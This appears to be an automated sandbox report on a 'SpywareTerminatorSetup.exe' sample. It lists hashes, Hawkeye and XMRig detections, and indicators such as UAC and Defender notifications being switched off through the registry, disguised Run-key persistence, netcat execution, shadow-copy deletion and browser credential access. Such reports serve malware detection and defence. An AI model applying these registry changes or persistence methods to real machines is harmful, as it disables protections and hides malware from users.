Analysis
-
max time kernel
1010s -
max time network
1201s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
08-11-2024 22:41
Static task
static1
Behavioral task
behavioral1
Sample
SpywareTerminatorSetup.exe
Resource
win10v2004-20241007-en
General
-
Target
SpywareTerminatorSetup.exe
-
Size
8.8MB
-
MD5
c3a9452f054664daf4de1e246c485c20
-
SHA1
e0185db4a5c5b7379a0eff099e39f0f56a18ba89
-
SHA256
9f95bbe3fb28e4c290e869b40ae20dcd9db64071cda11a77a9313c0e13b55518
-
SHA512
6438fb21aa223d354864b6ca14f42668007a17db718727266e54cd2b7f44e9924e51187b604cb7913dc550354114efc0b55834832f891ac6796a53abc928fca9
-
SSDEEP
196608:59Xf8Of5m6QpeBh4BE8h1RipvU0SQ7pZ+nU8TjLkYJC:TXfvflGeX4BXr6vtH1AUI/7J
Malware Config
Signatures
-
Hawkeye family
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" powershell.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" powershell.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Xmrig family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/4400-3961-0x00007FF6C68E0000-0x00007FF6C7E9A000-memory.dmp xmrig behavioral1/memory/5000-3979-0x00007FF6C68E0000-0x00007FF6C7E9A000-memory.dmp xmrig -
Adds policy Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run BraveSharedUpdater.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" BraveSharedUpdater.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run iexplore.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 3125 848 powershell.exe -
Contacts a large (1448) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\DRIVERS\SETC2D3.tmp RUNDLL32.EXE File opened for modification C:\Windows\system32\DRIVERS\stflt.sys RUNDLL32.EXE File opened for modification C:\Windows\system32\DRIVERS\SETC2D3.tmp RUNDLL32.EXE -
A potential corporate email address has been identified in the URL: [email protected]
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Adds Run key to start application 2 TTPs 22 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler64 = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler64.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" BraveSharedUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\ProgramData\\BraveCrashHandler.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" BraveSharedUpdater.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\Embedit.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SheIlExperienceHost = "C:\\Users\\Admin\\AppData\\Local\\SheIlExperienceHost.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorShield = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorShield.exe" SpywareTerminator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorShield = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorShield.exe" SpywareTerminator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\Embedit.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SheIlExperienceHost = "C:\\Users\\Admin\\AppData\\Local\\SheIlExperienceHost.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorUpdater = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorUpdate.exe" SpywareTerminator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" iexplore.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\ProgramData\\BraveCrashHandler.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Brv-Q0EV0O = "\"C:\\ProgramData\\BraveShared\\BraveSharedUpdater.exe\"" 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleCrashHandler64 = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleCrashHandler64.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorShield = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorShield.exe" SpywareTerminator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorUpdater = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorUpdate.exe" SpywareTerminator.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpywareTerminatorUpdater = "C:\\Program Files (x86)\\Spyware Terminator\\SpywareTerminatorUpdate.exe" SpywareTerminator.exe -
Downloads MZ/PE file
-
Installs/modifies Browser Helper Object 2 TTPs 6 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\ regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\NoExplorer = "1" regsvr32.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\ regsvr32.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{82A76710-4F98-4957-92BE-99648A4E2475}\NoExplorer = "1" regsvr32.exe -
Power Settings 1 TTPs 2 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5584 powercfg.exe 5708 powercfg.exe -
Program crash 1 IoCs
pid pid_target Process procid_target 5480 2344 WerFault.exe 289 -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation SpywareTerminator.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation SpywareTerminatorShield.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation SpywareTerminator.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation SpywareTerminator.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation SpywareTerminator.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation SpywareTerminatorSetup.tmp -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_254cd5ae09de6b08\usbport.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_adeb6424513f60a2\input.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_533c8d455025cc59\hdaudbus.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_0d06b6638bdb4763\mshdc.PNF dxdiag.exe File created C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_b748590104fe1c15\machine.PNF dxdiag.exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 1476 tasklist.exe 4424 tasklist.exe 3976 tasklist.exe 1708 tasklist.exe 4504 tasklist.exe 3752 tasklist.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
pid Process 1076 BraveCrashHandler.exe 1076 BraveCrashHandler.exe 1076 BraveCrashHandler.exe 1076 BraveCrashHandler.exe 1076 BraveCrashHandler.exe 1076 BraveCrashHandler.exe 1076 BraveCrashHandler.exe 1164 Embedit.exe 1164 Embedit.exe 1076 BraveCrashHandler.exe 1164 Embedit.exe 4432 GoogleCrashHandler.exe 4432 GoogleCrashHandler.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1084 set thread context of 4300 1084 Setup.exe 258 PID 2648 set thread context of 1424 2648 Setup.exe 266 PID 3772 set thread context of 2344 3772 BraveSharedUpdater.exe 289 PID 2344 set thread context of 4736 2344 iexplore.exe 292 -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 36 IoCs
description ioc Process File created C:\Program Files (x86)\Spyware Terminator\is-ABI25.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-AGLVN.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-7PDO7.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-LA7QJ.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-V57N4.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-I1234.tmp SpywareTerminatorSetup.tmp File opened for modification C:\Program Files (x86)\Spyware Terminator\unins000.dat SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\unins000.dat SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-7N4C0.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-B4B92.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-CC66M.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Driver\driver.cab st_rsser64.exe File created C:\Program Files (x86)\Spyware Terminator\com.spywareterminator.internetguard.json STInternetGuard.exe File opened for modification C:\Program Files (x86)\Spyware Terminator\Driver\stflt.inf st_rsser64.exe File created C:\Program Files (x86)\Spyware Terminator\Tools\is-J2HNC.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-VQD8U.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-QELN3.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-S4PAC.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-6H3VM.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-9NMLK.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-2ABCI.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-U6RNN.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-VCIL0.tmp SpywareTerminatorSetup.tmp File opened for modification C:\Program Files (x86)\Spyware Terminator\Driver\stflt.sys st_rsser64.exe File created C:\Program Files (x86)\Spyware Terminator\Tools\is-RBFK3.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-608EF.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-UTIBB.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-93CD3.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-GRDFG.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-SFTTG.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\is-N391K.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\Tools\is-BCGS3.tmp SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\unins000.msg SpywareTerminatorSetup.tmp File created C:\Program Files (x86)\Spyware Terminator\TorrentDll.dll SpywareTerminatorUpdate.exe File created C:\Program Files (x86)\Spyware Terminator\is-0G8J5.tmp SpywareTerminatorSetup.tmp File opened for modification C:\Program Files (x86)\Spyware Terminator\Driver\stflt.cat st_rsser64.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe File opened for modification C:\Windows\Logs\DISM\dism.log dismhost.exe File opened for modification C:\Windows\Logs\DISM\dism.log Dism.exe -
Executes dropped EXE 33 IoCs
pid Process 2340 SpywareTerminatorSetup.tmp 3768 SpywareTerminator.exe 812 st_rsser64.exe 4884 STInternetGuard.exe 4676 SpywareTerminator.exe 5052 SpywareTerminatorUpdate.exe 692 SpywareTerminatorShield.exe 1736 SpywareTerminatorUpdate.exe 5040 SpywareTerminator.exe 5056 SpywareTerminator.exe 760 SpywareTerminator.exe 4880 SpywareTerminatorUpdate.exe 5100 SpywareTerminatorUpdate.exe 4484 SpywareTerminatorUpdate.exe 4116 SpywareTerminator.exe 3636 SpywareTerminator.exe 4184 SpywareTerminatorUpdate.exe 3824 analyzefile.exe 1508 SpywareTerminator.exe 2240 SpywareTerminator.exe 1084 Setup.exe 2536 nc.exe 2648 Setup.exe 1244 nc.exe 2460 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe 3772 BraveSharedUpdater.exe 1076 BraveCrashHandler.exe 5872 dismhost.exe 5336 SpywareTerminator.exe 1164 Embedit.exe 3704 dismhost.exe 4432 GoogleCrashHandler.exe 5376 myst-launcher-amd64.exe -
Loads dropped DLL 64 IoCs
pid Process 2620 regsvr32.exe 4112 regsvr32.exe 4112 regsvr32.exe 4404 regsvr32.exe 1952 regsvr32.exe 3648 regsvr32.exe 760 regsvr32.exe 3288 regsvr32.exe 2344 regsvr32.exe 5052 SpywareTerminatorUpdate.exe 3528 Process not Found 3528 Process not Found 1084 Setup.exe 1084 Setup.exe 1084 Setup.exe 1084 Setup.exe 2648 Setup.exe 2648 Setup.exe 2648 Setup.exe 2648 Setup.exe 2648 Setup.exe 1524 AutoIt3.exe 2948 AutoIt3.exe 2460 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe 2460 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 5872 dismhost.exe 2344 iexplore.exe 2344 iexplore.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe 3704 dismhost.exe -
Modifies system executable filetype association 2 TTPs 24 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\ regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shellex\ContextMenuHandlers\STShellMenu\ = "{F32C83B9-DF1D-42AD-9741-C52909703957}" regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BraveSharedUpdater.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dxdiag.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language STInternetGuard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AutoIt3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language analyzefile.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorShield.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorSetup.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AutoIt3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminator.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SpywareTerminatorUpdate.exe -
EICAR Anti-Malware test file 1 IoCs
resource yara_rule behavioral1/files/0x0009000000023d65-718.dat eicar_test_file -
Makes web request to EICAR website 1 IoCs
EICAR Anti-Malware test file, used to test the response of AV software.
description flow ioc HTTP URL 1592 https://www.eicar.org/download/eicar-com/?wpdmdl=8840&refresh=672e945b769e71731105883 -
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
